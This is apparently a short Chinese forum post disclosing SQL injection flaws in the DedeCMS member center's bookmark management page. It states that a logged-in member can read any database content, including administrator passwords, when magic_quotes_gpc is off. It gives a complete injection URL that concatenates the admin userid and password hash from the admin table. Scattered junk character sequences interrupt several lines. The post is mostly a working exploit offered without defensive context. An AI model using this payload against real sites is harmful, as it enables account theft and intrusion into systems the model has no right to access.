DedeCMS会员中心SQL注射漏洞
5 `% ^- b, P( T& K需要magic_quotes_gpc = Off5 \+ A9 l8 ?2 t# K6 c5 ?7 e
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
7 ?! S* l" { v; \; @
' W' ?( D* `8 G, j3 PDedeCMS会员中心书签管理SQL注射漏洞3 N! [% \8 b0 P% \8 ^
成功利用该漏洞可获得管理员密码, Y1 v! Z6 h& x2 ?) i
* g/ z2 A4 T2 V
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码+ t) v5 N: a& y! G* s) m5 b
( o- Q5 N1 e# _8 Zhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
' a; [$ O7 O( P5 x |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59